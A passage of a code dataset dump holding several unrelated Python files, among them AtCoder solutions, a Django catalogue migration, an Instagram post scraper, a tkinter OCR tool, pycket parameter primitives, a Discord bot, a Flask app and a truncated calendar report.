self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_fastening.py","file_name":"_fastening.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"262105502","text":"from collections import deque\nimport copy, sys\ninput = sys.stdin.readline\n\nn = int(input())\na = [deque(map(lambda x: int(x) - 1, input().split())) for _ in range(n)]\nq = deque()\npre_q = deque()\nday = 0\n\ndef check(p, q):\n if not len(a[p]):\n return\n o = a[p][0]\n if p == a[o][0]:\n if p > o: p, o = o, p\n if not (p, o) in q:\n q.append((p, o))\n\nfin = []\nfor p in range(n):\n if not p in fin:\n o = a[p][0]\n if p == a[o][0]:\n q.append((p, o))\n fin += [p, o]\n\nwhile q:\n day += 1\n pre_q = copy.copy(q)\n q.clear()\n for (p, o) in pre_q:\n a[p].popleft()\n a[o].popleft()\n check(p, q)\n check(o, q)\n\nif all(map(len, a)):\n print(-1)\nelse:\n print(day)\n","sub_path":"ABC/ABC139/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"564773470","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.db.models.deletion\nimport oscar.core.validators\nimport django.utils.timezone\nfrom django.conf import settings\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('catalogue', '0002_auto_20150217_1221'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ProductGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200, verbose_name='\\u540d\\u5b57')),\n ],\n options={\n 'verbose_name': '\\u4ea7\\u54c1\\u7ec4',\n 'verbose_name_plural': '\\u4ea7\\u54c1\\u7ec4',\n },\n ),\n migrations.CreateModel(\n name='SearchFilter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('search_value', models.CharField(help_text='\\u533a\\u95f4\\u503c\\u8bbe\\u7f6e\\u6210 eg:30\\u5ea6-40\\u5ea6', max_length=120, null=True, verbose_name='\\u641c\\u7d22\\u503c', blank=True)),\n ('value_range', models.CharField(choices=[(b'>', '\\u4ee5\\u4e0a'), (b'<', '\\u4ee5\\u4e0b')], max_length=120, blank=True, help_text='\\u4e0d\\u662f\\u8303\\u56f4\\u7684\\u5c5e\\u6027\\u503c\\u4e3a\\u7a7a', null=True, verbose_name='\\u9009\\u62e9\\u8303\\u56f4')),\n ('search_order', models.IntegerField(null=True, verbose_name='\\u641c\\u7d22\\u503c\\u6392\\u5217\\u987a\\u5e8f', blank=True)),\n ('chose', models.BooleanField(default=True, verbose_name='\\u9009\\u62e9\\u8be5\\u641c\\u7d22\\u503c')),\n ],\n options={\n 'ordering': ['attribute'],\n 'verbose_name': '\\u641c\\u7d22\\u5c5e\\u6027\\u914d\\u7f6e',\n 'verbose_name_plural': '\\u641c\\u7d22\\u5c5e\\u6027\\u914d\\u7f6e',\n },\n ),\n migrations.AddField(\n model_name='category',\n name='product_class',\n field=models.ForeignKey(related_name='categories', blank=True, to='catalogue.ProductClass', help_text='\\u9009\\u62e9\\u5206\\u7c7b\\u7684\\u7c7b\\u5c5e\\u6027\\uff0c\\u7ed1\\u5b9a\\u5206\\u7c7b\\u5546\\u54c1\\u5c5e\\u6027\\u503c', null=True, verbose_name='\\u5206\\u7c7b\\u7c7b\\u5c5e\\u6027'),\n ),\n migrations.AddField(\n model_name='product',\n name='browse_num',\n field=models.BigIntegerField(default=0, verbose_name='\\u6d4f\\u89c8\\u6b21\\u6570'),\n ),\n migrations.AddField(\n model_name='product',\n name='featured_hot',\n field=models.BooleanField(default=False, verbose_name='\\u4e3b\\u63a8\\u70ed\\u5356'),\n ),\n migrations.AddField(\n model_name='product',\n name='hot_deals',\n field=models.BooleanField(default=False, verbose_name='\\u706b\\u70ed\\u4fc3\\u9500'),\n ),\n migrations.AddField(\n model_name='product',\n name='is_associate',\n field=models.BooleanField(default=False, verbose_name='\\u662f\\u5426\\u5173\\u8054'),\n ),\n migrations.AddField(\n model_name='product',\n name='is_on_shelves',\n field=models.BooleanField(default=True, verbose_name='\\u662f\\u5426\\u4e0a\\u67b6'),\n ),\n migrations.AddField(\n model_name='product',\n name='new_listing',\n field=models.BooleanField(default=False, verbose_name='\\u65b0\\u54c1\\u4e0a\\u5e02'),\n ),\n migrations.AddField(\n model_name='product',\n name='opening_date',\n field=models.DateField(default=django.utils.timezone.now, verbose_name='\\u4e0a\\u5e02\\u65f6\\u95f4'),\n ),\n migrations.AddField(\n model_name='product',\n name='product_long_image',\n field=models.ImageField(upload_to=b'images/products/%Y/%m/', null=True, verbose_name='\\u5e7f\\u544a\\u957f\\u56fe', blank=True),\n ),\n migrations.AddField(\n model_name='product',\n name='selection_reputation',\n field=models.BooleanField(default=False, verbose_name='\\u53e3\\u7891\\u7504\\u9009'),\n ),\n migrations.AddField(\n model_name='product',\n name='trader',\n field=models.ForeignKey(related_name='trader', verbose_name='\\u4ea4\\u6613\\u5458', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n ),\n migrations.AddField(\n model_name='productattribute',\n name='index',\n field=models.IntegerField(null=True, verbose_name='\\u6392\\u5e8f', blank=True),\n ),\n migrations.AddField(\n model_name='productattribute',\n name='search_filter',\n field=models.BooleanField(default=True, help_text='\\u8bbe\\u7f6e\\u4e0d\\u9700\\u8981\\u641c\\u7d22\\u7684\\u5c5e\\u6027\\u503c', verbose_name='\\u662f\\u5426\\u641c\\u7d22'),\n ),\n migrations.AlterField(\n model_name='category',\n name='slug',\n field=models.SlugField(max_length=255, verbose_name='Slug'),\n ),\n migrations.AlterField(\n model_name='product',\n name='product_class',\n field=models.ForeignKey(related_name='products', on_delete=django.db.models.deletion.PROTECT, blank=True, to='catalogue.ProductClass', help_text='Choose what type of product this is', null=True, verbose_name='Product type'),\n ),\n migrations.AlterField(\n model_name='productattribute',\n name='code',\n field=models.SlugField(max_length=128, verbose_name='Code', validators=[django.core.validators.RegexValidator(regex=b'^[a-zA-Z_][0-9a-zA-Z_]*$', message=\"Code can only contain the letters a-z, A-Z, digits, and underscores, and can't start with a digit\"), oscar.core.validators.non_python_keyword]),\n ),\n migrations.AddField(\n model_name='searchfilter',\n name='attribute',\n field=models.ForeignKey(verbose_name='Attribute', to='catalogue.ProductAttribute'),\n ),\n migrations.AddField(\n model_name='productgroup',\n name='attr',\n field=models.ManyToManyField(related_name='product_group_attr', verbose_name='\\u4ea7\\u54c1\\u7ec4\\u5c5e\\u6027', to='catalogue.ProductAttribute', blank=True),\n ),\n migrations.AddField(\n model_name='product',\n name='product_group',\n field=models.ForeignKey(related_name='product_group', verbose_name='\\u4ea7\\u54c1\\u7ec4', blank=True, to='catalogue.ProductGroup', null=True),\n ),\n ]\n","sub_path":"webapp/apps/catalogue/migrations/0003_auto_20160202_1639.py","file_name":"0003_auto_20160202_1639.py","file_ext":"py","file_size_in_byte":6811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58891464","text":"\"\"\"\n instagramy.InstagramPost\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n This module scrape Instagram Post data\n for given Instagram Post id.\n\n Usage Example\n -------------\n ::\n\n from instagramy.InstagramHashtag import InstagramPost\n\n >>> post = InstagramPost('CGeYX2OA61s')\n >>> post.author\n >>> post.number_of_likes\n >>> post.number_of_comments\n\n\"\"\"\n\nfrom .core.parser import ParsePost\nfrom .core.requests import get\nfrom .core.exceptions import PostIdNotFound, HTTPError\n\n\nclass InstagramPost:\n \"\"\"\n Class InstagramPost scrape the post information\n by given post id (From url of the post)\n `https://www.instagram.com/p//`\n `https://www.instagram.com/p/CGeYX2OA61s/`\n\n >>> post = InstagramPost(\"CGeYX2OA61s\")\n >>> post.author\n '@virat.kohli'\n >>> post.number_of_likes\n 2203830\n >>> post.number_of_comments\n 4629\n \"\"\"\n\n def __init__(self, post_id: str):\n self.post_id = post_id\n self.url = f\"https://www.instagram.com/p/{post_id}/\"\n self.post_details = self.post_detail()\n\n def post_detail(self) -> dict:\n \"\"\"\n Return a dict of Post information\n \"\"\"\n\n try:\n html = get(self.url)\n except HTTPError:\n raise PostIdNotFound(self.post_id)\n parser = ParsePost()\n parser.feed(html)\n info = parser.Data\n post_details = {}\n try:\n post_details[\"caption\"] = info[\"caption\"]\n except (KeyError, TypeError):\n post_details[\"caption\"] = None\n try:\n post_details[\"uploaddate\"] = info[\"uploadDate\"]\n except (KeyError, TypeError):\n post_details[\"uploaddate\"] = None\n try:\n post_details[\"author\"] = info[\"author\"][\"alternateName\"]\n except (KeyError, TypeError):\n post_details[\"author\"] = None\n try:\n post_details[\"profile_page_url\"] = info[\"author\"][\"mainEntityofPage\"][\"@id\"]\n except (KeyError, TypeError):\n post_details[\"profile_page_url\"] = None\n try:\n post_details[\"likes\"] = info[\"interactionStatistic\"][\"userInteractionCount\"]\n except (KeyError, TypeError):\n post_details[\"likes\"] = None\n try:\n post_details[\"comments\"] = info[\"commentCount\"]\n except (KeyError, TypeError):\n post_details[\"comments\"] = None\n try:\n post_details[\"description\"] = info[\"description\"]\n except (KeyError, TypeError):\n post_details[\"description\"] = None\n\n return post_details\n\n @property\n def number_of_likes(self) -> int:\n \"\"\" No.of Like is given post \"\"\"\n return int(self.post_details[\"likes\"])\n\n @property\n def number_of_comments(self) -> int:\n \"\"\" No.of Comments is given post \"\"\"\n return int(self.post_details[\"comments\"])\n\n @property\n def author(self) -> str:\n \"\"\" Author of the Post \"\"\"\n return self.post_details[\"author\"]\n\n @property\n def caption(self) -> str:\n \"\"\" Caption of the Post \"\"\"\n return self.post_details[\"caption\"]\n\n @property\n def description(self) -> str:\n \"\"\" Discription of the Post given by Instagram \"\"\"\n return self.post_details[\"description\"]\n\n def __repr__(self) -> str:\n return f\"{self.__class__.__name__}('{self.post_id}')\"\n\n def __str__(self) -> str:\n return f\"Post ({self.post_id}) posted by {self.author} with {self.number_of_likes} likes\"\n","sub_path":"instagramy/InstagramPost.py","file_name":"InstagramPost.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"133725935","text":"from tkinter import *\r\nimport tkinter as tk\r\nfrom tkinter import filedialog,Text\r\nfrom PIL import Image,ImageTk\r\nimport cv2\r\nimport numpy as np\r\nimport pytesseract as pt\r\nfrom pytesseract import Output\r\n\r\nimg=np.zeros((),np.uint8)\r\nnew_img=np.zeros((),np.uint8)\r\ntext=''\r\ncounter=0\r\n\r\nroot=tk.Tk()\r\ncanvas=tk.Canvas(root,height=700,width=700,bg='#00FFFF')\r\ncanvas.pack()\r\nframe=tk.Frame(root,bg='black')\r\nframe.place(relwidth=0.6,relheight=0.8,relx=0.2,rely=0.05)\r\ntext_box=tk.Frame(frame,bg='#FAEBD7')\r\ntext_box.place(relwidth=0.6,relheight=0.6,relx=0.2,rely=0.2)\r\n\r\ndef open_button_click():\r\n filename = filedialog.askopenfilename(initialdir = '/Users/Desktop/',title = 'Select an Image',filetypes = (('JPG','*.jpg'),('All files','*.*')))\r\n print(filename)\r\n global img,new_img\r\n img = cv2.imread(filename)\r\n print(img.shape)\r\n img=cv2.resize(img,(700,700))\r\n new_img=img.copy()\r\n cv2.imshow('frame',img)\r\n cv2.waitKey(0)\r\n\r\ndef blur_button_click():\r\n global new_img,img\r\n img_gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n kernel=np.ones((2,2))\r\n gaussian_blur=cv2.GaussianBlur(img_gray,(5,5),2)\r\n new_img=gaussian_blur.copy()\r\n cv2.imshow('frame',gaussian_blur)\r\n\r\ndef auto_button_click():\r\n global new_img,img\r\n image=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n kernel=np.ones((5,5))\r\n gaussian_blur=cv2.GaussianBlur(image,(5,5),2)\r\n edge=cv2.Canny(gaussian_blur,40,280)\r\n contours,hierarchy=cv2.findContours(edge,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n areas=[cv2.contourArea(c) for c in contours]\r\n max_index=np.argmax(areas)\r\n max_contour=contours[max_index]\r\n perimeter=cv2.arcLength(max_contour,True)\r\n ROI=cv2.approxPolyDP(max_contour,0.01*perimeter,True)\r\n cv2.drawContours(img,[ROI],-1,(0,255,0),2)\r\n pts_1=np.array([ROI[0],ROI[1],ROI[3],ROI[2]],np.float32)\r\n pts_2=np.array([(0,0),(500,0),(0,500),(500,500)],np.float32)\r\n perspective=cv2.getPerspectiveTransform(pts_1,pts_2)\r\n transformed=cv2.warpPerspective(img,perspective,(500,500))\r\n cv2.imshow('output',transformed)\r\n\r\ndef manual_button_click():\r\n pts=[]\r\n def mouse(event,x,y,flags,param):\r\n global new_img,img\r\n if event==cv2.EVENT_LBUTTONDOWN:\r\n pts.append((x,y))\r\n if len(pts)==4:\r\n warp(pts)\r\n def warp(pts):\r\n global new_img,img\r\n pts_1=np.array([pts[0],pts[1],pts[3],pts[2]],np.float32)\r\n pts_2=np.array([(0,0),(500,0),(0,500),(500,500)],np.float32)\r\n perspective=cv2.getPerspectiveTransform(pts_1,pts_2)\r\n transformed=cv2.warpPerspective(img,perspective,(500,500))\r\n new_img=transformed.copy()\r\n cv2.imshow('frame',transformed)\r\n cv2.namedWindow('frame')\r\n cv2.setMouseCallback('frame',mouse)\r\n\r\n\r\n\r\ndef ocr_button_click():\r\n \r\n global new_img,text\r\n ret,global_thresh=cv2.threshold(new_img,170,255,cv2.THRESH_BINARY)\r\n text = pt.image_to_string(global_thresh,lang= 'eng')\r\n data = pt.image_to_data(global_thresh,output_type= Output.DICT)\r\n no_word = len(data['text'])\r\n for i in range(no_word):\r\n if int(data['conf'][i]) > 50:\r\n x,y,w,h = data['left'][i],data['top'][i],data['width'][i],data['height'][i]\r\n cv2.rectangle(global_thresh,(x,y),(x+w,y+h),(0,255,0),2)\r\n cv2.imshow('frame',global_thresh)\r\n cv2.waitKey(200)\r\n 'new_img=global_thresh.copy()'\r\n\r\n\r\ndef show_button_click():\r\n global text\r\n textbox = tk.Frame(frame,bg = '#FDFFD6')\r\n textbox.place(relx = 0.2,rely = 0.2,relwidth =0.6,relheight =0.6)\r\n text_frame = Text(textbox,bg = '#FDFFD6')\r\n text_frame.insert('1.0',text)\r\n text_frame.pack()\r\n\r\ndef save_button_click():\r\n global counter\r\n global new_img\r\n counter+=1\r\n cv2.imwrite('image_'+str(counter) + '.jpg', new_img) \r\n\r\ndef original_img_button_click():\r\n global new_img\r\n new_img=img.copy()\r\n cv2.imshow('frame',img)\r\n\r\ndef flip_button_click():\r\n global new_img\r\n flipped=cv2.flip(new_img,1)\r\n cv2.imshow('frame',flipped)\r\n\r\ndef rotate_button_click():\r\n global new_img\r\n rotate=cv2.rotate(new_img,cv2.ROTATE_90_CLOCKWISE)\r\n cv2.imshow('frame',rotate)\r\n\r\n\r\ndef destroy_button_click():\r\n cv2.destroyAllWindows()\r\n\r\nlabel=tk.Label(frame,text='TEXT DETECTED',fg='black',bg='white',font=('Bold',16))\r\nlabel.place(relx=0.3,rely=0.1)\r\n\r\nopenfile = tk.Button(canvas,text = 'Open Image',fg = '#000000',padx = 5,pady = 5, command = open_button_click)\r\nopenfile.place(relx=0.04,rely=0.1)\r\n\r\nblurimage=tk.Button(canvas,text='Blur Image',fg = '#000000',padx = 5,pady = 5, command = blur_button_click)\r\nblurimage.place(relx=0.038,rely=0.2)\r\n\r\nautocrop=tk.Button(canvas,text='Auto Crop',fg = '#000000',padx = 5,pady = 5, command = auto_button_click)\r\nautocrop.place(relx=0.038,rely=0.3)\r\n\r\nmanualcrop=tk.Button(canvas,text='Manual Crop',fg = '#000000',padx = 5,pady = 5, command = manual_button_click)\r\nmanualcrop.place(relx=0.035,rely=0.4)\r\n\r\nocrbutton=tk.Button(canvas,text='OCR',fg = '#000000',padx = 20,pady = 5, command = ocr_button_click)\r\nocrbutton.place(relx=0.85,rely=0.1)\r\n\r\nshowtext=tk.Button(canvas,text='Show text',fg = '#000000',padx = 5,pady = 5, command = show_button_click)\r\nshowtext.place(relx=0.85,rely=0.2)\r\n\r\nsaveimage=tk.Button(canvas,text='Save Image',fg = '#000000',padx = 5,pady = 5, command = save_button_click)\r\nsaveimage.place(relx=0.85,rely=0.3)\r\n\r\nshoworiginal=tk.Button(canvas,text='Original Image',fg = '#000000',padx = 5,pady = 5, command = original_img_button_click)\r\nshoworiginal.place(relx=0.83,rely=0.4)\r\n\r\nflipimage=tk.Button(canvas,text='Flip Image',fg = '#000000',padx = 5,pady = 5, command = flip_button_click)\r\nflipimage.place(relx=0.037,rely=0.5)\r\n\r\nrotateimage=tk.Button(canvas,text='Rotate Image',fg = '#000000',padx = 5,pady = 5, command = rotate_button_click)\r\nrotateimage.place(relx=0.84,rely=0.5)\r\n\r\ndestroywindow=tk.Button(canvas,text='Close windows',fg = '#000000',padx = 8,pady = 8, command = destroy_button_click)\r\ndestroywindow.place(relx=0.4,rely=0.88)\r\n\r\nroot.mainloop()","sub_path":"miniproject/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651839074","text":"\nfrom pycket import values\nfrom pycket import values_parameter\nfrom pycket.base import W_Object\nfrom pycket.error import SchemeException\nfrom pycket.prims.expose import expose, expose_val, default, procedure\n\n@expose(\"make-parameter\",\n [values.W_Object, default(values.W_Object, values.w_false)])\ndef make_parameter(init, guard):\n return values_parameter.W_Parameter(init, guard)\n\n@expose(\"make-derived-parameter\",\n [values_parameter.W_BaseParameter, procedure, procedure])\ndef make_derived_parameter(param, guard, wrap):\n return values_parameter.W_DerivedParameter(param, guard, wrap)\n\n@expose(\"extend-parameterization\",\n [values.W_Object, values.W_Object, values.W_Object])\ndef extend_paramz(paramz, key, val):\n if not isinstance(key, values_parameter.W_BaseParameter):\n raise SchemeException(\"Not a parameter: \" + key.tostring())\n if isinstance(paramz, values_parameter.W_Parameterization):\n return paramz.extend([key], [val])\n else:\n return paramz # This really is the Racket behavior\n\ndef call_with_parameterization(f, args, paramz, env, cont):\n cont.update_cm(values.parameterization_key, paramz)\n return f.call(args, env, cont)\n\n@expose(\"call-with-parameterization\",\n [values.W_Object, values_parameter.W_Parameterization], simple=False)\ndef call_w_paramz(f, paramz, env, cont):\n return call_with_parameterization(f, [], paramz, env, cont)\n\ndef call_with_extended_paramz(f, args, keys, vals, env, cont):\n from pycket.values import parameterization_key\n # XXX seems untested?\n paramz = cont.get_mark_first(parameterization_key)\n assert isinstance(paramz, values_parameter.W_Parameterization) # XXX is this always right?\n paramz_new = paramz.extend(keys, vals)\n return call_with_parameterization(f, args, paramz_new, env, cont)\n\n\nexpose_val(\"parameterization-key\", values.parameterization_key)\nexpose_val(\"print-mpair-curly-braces\", values_parameter.W_Parameter(values.w_false))\nexpose_val(\"print-pair-curly-braces\", values_parameter.W_Parameter(values.w_false))\n\n","sub_path":"pycket/prims/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552376260","text":"import sys\ninput = sys.stdin.readline\nfrom operator import itemgetter\nsys.setrecursionlimit(10000000)\nINF = 10**30\nimport heapq\n\ndef main():\n s = input().strip()\n n = len(s)\n stq = set()\n k = int(input().strip())\n for i in range(n):\n for j in range(i+1, min(i+1+k+1, n+1)):\n stq.add(s[i:j])\n stq = list(stq)\n heapq.heapify(stq)\n for i in range(k):\n ans = heapq.heappop(stq)\n if i == k-1:\n print(ans)\n\nif __name__ == '__main__':\n main()\n","sub_path":"abc97-c.py","file_name":"abc97-c.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309196774","text":"import discord\nfrom discord.ext import commands\nfrom datetime import datetime\nfrom cogs.utils.tf.SakuModel import SakuModel\nimport logging\n\n# Extensions to load into BubuBot:\nBASE_EXTENSIONS = (\n 'cogs.BaseCommands',\n 'cogs.Clear',\n 'cogs.Shadowverse',\n 'cogs.Emotes',\n 'cogs.Move',\n 'cogs.Voice',\n 'cogs.Games')\n\n\nclass BubuBot(commands.Bot):\n\n def __init__(self, *args, **kwargs):\n '''Initializes a BubuBot object'''\n # Bot parameters:\n self.login_time = None # To be updated on ready\n self.owner_id = None\n self.SakuModel = None\n self.DEBUG_MODE = kwargs.pop('DEBUG_MODE', False)\n self.DATABASE_URL = kwargs.pop('DATABASE_URL', None)\n self.NO_HEROKU = kwargs.pop('NO_HEROKU', False)\n extensions = kwargs.pop('extensions', BASE_EXTENSIONS)\n self.logger = self.set_logger(self.DEBUG_MODE)\n\n super().__init__(*args, **kwargs)\n \n # Loading the cogs:\n for extension in extensions:\n try:\n self.load_extension(extension)\n except Exception as err:\n self.logger.exception('Failed to load {}'.format(extension))\n\n # Base events:\n @self.event\n async def on_ready():\n # Grabbing the bot's app info:\n # *this needs to be saved in a variable or you can't access its content\n app_info = await self.application_info() # returns a namedtuple\n \n # Setting up some bot attributes:\n self.owner_id = app_info.owner.id\n self.login_time = datetime.now()\n await self.change_presence(game=discord.Game(name='waga na wa bubu'))\n self.SakuModel = SakuModel('cogs/utils/tf/retrained_labels.txt', 'cogs/utils/tf/retrained_graph.pb')\n # Login log messages:\n print('Logged in as')\n print(self.user.name)\n print(self.user.id)\n print('OwnerID: {}'.format(self.owner_id))\n print('------')\n\n @self.event\n async def on_command_error(err, ctx):\n channel = ctx.message.channel\n if isinstance(err, commands.CheckFailure):\n await self.send_message(channel, content=\"Insufficient permissions\")\n elif isinstance(err, commands.CommandNotFound):\n await self.send_message(channel, content=\"Not a command\")\n elif isinstance(err, commands.CommandOnCooldown):\n await self.send_message(channel, content=\"{} Chillax my dude\".format(ctx.message.author.mention))\n else:\n self.logger.exception(\"Unexpected error: {}--{}--{}\".format(err, ctx.message.content, channel))\n await self.send_message(channel, content=\"Something bad happened\")\n\n @staticmethod\n def set_logger(DEBUG_MODE=False):\n \"\"\"Create a logger on debug mode or info mode\"\"\"\n if DEBUG_MODE:\n level = logging.DEBUG\n else:\n level = logging.INFO\n logger = logging.getLogger(__name__)\n logger.setLevel(level)\n\n bot_format = logging.Formatter(\n '%(asctime)s %(levelname)s %(module)s %(funcName)s %(lineno)d: '\n '%(message)s',\n datefmt=\"[%d/%m/%Y %H:%M]\")\n\n # Create a handler that prints to stdout:\n stdout_handler = logging.StreamHandler()\n stdout_handler.setFormatter(bot_format)\n stdout_handler.setLevel(level)\n\n logger.addHandler(stdout_handler)\n\n return logger\n","sub_path":"BubuBot.py","file_name":"BubuBot.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309624604","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/7/30 11:57\n# @Author : ShaoJK\n# @File : app.py\n# @Remark :\n\n\nfrom flask import Flask\n\nfrom views import inventory, purchase\nfrom modules import db\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///LiteDB.db'\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True # 自动commit\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = True\ndb.init_app(app)\n\napp.register_blueprint(inventory)\napp.register_blueprint(purchase)\n\nwith app.app_context():\n db.create_all()\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"103106935","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Report import Report\nfrom calendar import *\nfrom globals import globals\n\n\ndef GetPublicHolidays(FromDate,ToDate):\n days = []\n query = Query()\n query.sql = \"SELECT {Date} FROM [PublicHoliday]\"\n query.sql += \" WHERE?AND {Date}>=d|%s|\" % FromDate\n query.sql += \" WHERE?AND {Date}<=d|%s|\" % ToDate\n if (query.open()):\n for dates in query:\n days.append(dates.Date.day)\n return days\n\nPersonBGColors = [\"#FFEEDD\", \"#EDFEDF\", \"#EABFDE\", \"#FFEEDE\",\"#FFEBB\",\"#EEAADF\"]\nclass ShowCalendar(Report): \n\n def run(self):\n if (not self.__dict__.has_key(\"SchedLoaded\")):\n self.ShowMonth = True\n self.ShowWeek = False\n self.ShowDay = False\n self.SchedLoaded = False\n self.monthCalendar = {}\n self.WeekNr = {}\n self.BlueDays = [] \n self.getView().resize(460,615)\n \n self.record = self.getRecord()\n self.Persons = self.record.Users.replace(' ','').split(\",\")\n self.showActions()\n if(self.ShowMonth): self.DisplayMonthlyCalendar()\n if(self.ShowWeek): self.DisplayWeeklyCalendar()\n if(self.ShowDay): self.DisplayDailyCalendar()\n \n def showActions(self):\n self.startTable()\n self.startRow()\n self.addValue(tr(\"Create Activity\"), CallMethod=\"createActivity\")\n self.endRow()\n self.endTable()\n \n def createActivity(self,value):\n from Activity import Activity\n from ActivityWindow import ActivityWindow\n act = Activity()\n act.defaults()\n act.Users = self.record.Users\n actwindow = ActivityWindow()\n actwindow.setRecord(act)\n actwindow.open()\n \n def DisplayMonthlyCalendar(self):\n self.startTable(Border=\"1\")\n self.startHeaderRow()\n self.addValue(\"%s de %i\" % (globals.MonthNames[self.record.Date.month], self.record.Date.year), ColSpan=\"8\")\n self.endHeaderRow()\n self.startHeaderRow()\n self.addValue(tr(\"Week\"))\n self.loadMonthCalendar()\n for day in globals.DayNames:\n self.addValue(day)\n self.endHeaderRow()\n RedDays = GetPublicHolidays(StartOfMonth(self.record.Date),EndOfMonth(self.record.Date))\n weeknr = StartOfMonth(self.record.Date).isocalendar()[1]\n weekday = 0\n MonthGrid = monthcalendar(self.record.Date.year,self.record.Date.month)\n for row in MonthGrid:\n self.startRow()\n if row[0]: \n self.WeekNr[weeknr] = date(self.record.Date.year,self.record.Date.month,row[0])\n else:\n self.WeekNr[weeknr] = date(self.record.Date.year,self.record.Date.month,row[6])\n self.addValue(weeknr, CallMethod=\"bringWeek\")\n for daynr in row:\n BGround = \"White\"\n FGround = \"Black\"\n if (daynr == 0): \n daystr = \"\"\n else:\n daystr = daynr\n if (daynr==self.record.Date.day): BGround=\"Gray\"\n if weekday in (5,6) or (daynr in RedDays): FGround=\"Red\"\n if self.monthCalendar.has_key(daynr): FGround = \"blue\"\n self.addValue(daystr, BGColor=BGround, Color=FGround, CallMethod=\"bringDay\")\n weekday = (weekday + 1) % 7\n self.endRow()\n weeknr += 1\n \n self.endTable()\n self.startTable() \n self.startHeaderRow()\n self.addValue(tr(\"Previous\"), CallMethod=\"move\", Parameter=\"000\")\n self.addValue(tr(\"Next\"), CallMethod=\"move\", Parameter=\"001\")\n self.endHeaderRow()\n self.endTable()\n \n def DisplayWeeklyCalendar(self):\n self.addHTML(\"
\")\n self.startTable(Border=\"1\")\n self.startRow()\n self.endRow()\n self.startHeaderRow()\n udate = addDays(self.record.Date, 6)\n self.addValue(tr(\"Close\"), CallMethod=\"closeWeek\")\n self.addValue(\"%s %i %s %s %s %i %s %i %s %s %s %s\" % (tr(\"Week from\"),self.record.Date.day,tr(\"of\"), globals.MonthNames[self.record.Date.month], tr(\"of\"),self.record.Date.year,tr(\"To\"), udate.day,tr(\"of\"), globals.MonthNames[udate.month],tr(\"of\"), udate.year), ColSpan=\"7\", CallMethod=\"closeWeek\")\n self.endHeaderRow()\n self.startHeaderRow()\n self.addValue(\"\")\n idate = self.record.Date\n sched = {}\n for i in range(0,7):\n query = Query()\n query.sql = \"SELECT * FROM [Activity] WHERE {StartDate}<=d|%s| AND {EndDate}>=d|%s|\" % (str(idate), str(idate))\n if query.open():\n if (query.count()):\n for rec in query:\n sched[idate.day] = rec\n else:\n sched[idate.day] = None\n query.close()\n self.addValue(idate.day, CallMethod=\"bringDay\")\n idate = addDays(idate,1)\n self.endHeaderRow()\n self.startHeaderRow()\n self.addValue(\"Hora\")\n for day in globals.DayNames:\n self.addValue(day)\n self.endHeaderRow()\n for t in range(7,20):\n self.startRow()\n self.addValue(\"%d:00\" % t)\n i = self.record.Date.day\n for day in globals.DayNames:\n BG=\"white\"\n DaysNr = monthrange(self.record.Date.year, self.record.Date.month)[1]\n if ((i <= DaysNr) and (sched[i])):\n Schedule = sched[i]\n if ((time(t,0,0) >= Schedule.StartTime) and (time(t,0,0) <= Schedule.EndTime)):\n BG=\"red\"\n self.addValue(\"\", BGColor=BG)\n i += 1\n self.endRow()\n \n self.endTable()\n self.startTable()\n self.startHeaderRow()\n self.addValue(\"Anterior\", CallMethod=\"move\", Parameter=\"010\")\n self.addValue(\"Siguiente\", CallMethod=\"move\", Parameter=\"011\")\n self.endHeaderRow()\n self.endTable()\n \n def getPreparedDailySched(self):\n query = Query()\n query.sql = \"SELECT * FROM [Activity]\"\n query.sql += \" WHERE?AND {EndDate} >= d|%s|\" % self.record.Date\n query.sql += \" WHERE?AND {StartDate} <= d|%s|\" % self.record.Date\n query.sql += \" WHERE?AND (\";\n OR = \"\"\n for person in self.Persons:\n query.sql += OR + \" {Users} LIKE s|%s|\" % (\"%\" + person + \"%\")\n OR = \"OR\"\n query.sql += \")\"; \n query.sql += \" ORDER BY {StartTime}\"\n \n sched = {}\n for h in range(8,20):\n sched[h] = {}\n for m in range(0,60,10):\n 